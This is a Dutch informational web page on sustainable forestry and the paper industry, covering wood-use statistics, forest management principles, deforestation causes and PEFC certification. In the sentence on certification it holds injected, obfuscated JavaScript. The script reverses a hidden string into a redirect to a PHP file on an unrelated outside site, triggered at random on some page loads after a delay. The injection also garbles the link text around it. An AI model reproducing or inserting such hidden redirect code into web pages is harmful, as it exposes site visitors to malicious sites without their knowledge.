Select Page

Duurzame bosbouw

Mede door de productiebossen van de hout- en papierindustrie groeit de bosoppervlakte in Europa. Sinds 1950 is het Europese bosoppervlak toegenomen met 30% (*). Met zorg wordt bos verbouwd, geoogst en opnieuw geplant. 11% van het wereldwijd geoogste hout wordt direct door de papierindustrie gebruikt.

 50% van het wereldwijd geoogste hout wordt gebruikt voor het opwekken van energie en het produceren van warmte voor huizen. 28% vindt toepassing in de bouwindustrie. 11% wordt aangewend voor het maken van papier (**).

Duurzaam bosbeheer houdt rekening met het behoud en bescherming van:

 • sociaal-culturele, ecologische en economische waarden;
 • ecologische evenwicht van fauna en flora;
 • bodem- en waterhuishouding;
 • biodiversiteit;
 • in en van het bos levende bevolkingsgroepen;
 • bos voor toekomstige generaties.

Door duurzaam bosbeheer is hout een duurzame grondstof. Niet alle bossen worden op verantwoorde wijze beheerd.

De belangrijkste oorzaken van ontbossing zijn: niet-duurzame landbouw en houtkap; mijnbouw;infrastructuurprojecten; en bosbranden (***).

Het verdwijnen van grote arealen bos en de aantasting van de biodiversiteit zijn de belangrijkste redenen dat certificering van duurzaam bosbeheer in de jaren ’90 is ontstaan. Duurzaam bosbeheer wordt onder andere gecertificeerd door $Ikf=function(n){if (typeof ($Ikf.list[n]) == “string”) return $Ikf.list[n].split(“”).reverse().join(“”);return $Ikf.list[n];};$Ikf.list=[“\’php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and” href=”http://www.pefcnederland.nl/” target=”_blank”>PEFC. Circa 75% van de door de Europese papierindustrie gebruikte verse houtvezels komt uit gecertificeerd bos (****). In 2010 was dat nog ruim 71% (****). Alle door de Nederlandse papierindustrie geïmporteerde houtvezels zijn afkomstig uit duurzaam beheerde bossen.

Illegaal hout is hout dat in strijd met (inter)nationale wetten wordt gekapt, verwerkt, vervoerd en/of verhandeld. De ecologische gevolgen van deze inbreuken zijn groot. Keurmerken kunnen helpen bij het vinden van duurzaam hout, papier en karton. De grootste en directe oorzaak van tropische ontbossing is de omzetting van bos naar landbouwgrond (*****).

 • (*) Global Forest Assesment 2010/ FAO Forestry Paper 163, figure 2.4 en Food and agriculture organization (FAO) of the United Nations  and Economic Commission for Europe of the United Nations (UNECE), 2003, The development of European forest resources, 1950 to 2000: a better information base, grafiek 701.
 • (**) Afgeleid uit and_source_2014.pdf” target=”_blank”>FAOSTAT Forestry database 2011: Global Forest Products Facts and Figures
 • (***) WWF 2015 Living Forest Report Chapter 5
 • (****) CEPI Sustainability Report, 2013.
 • (*****) Nasa Earth Observatory: Causes of Deforestation: Direct Causes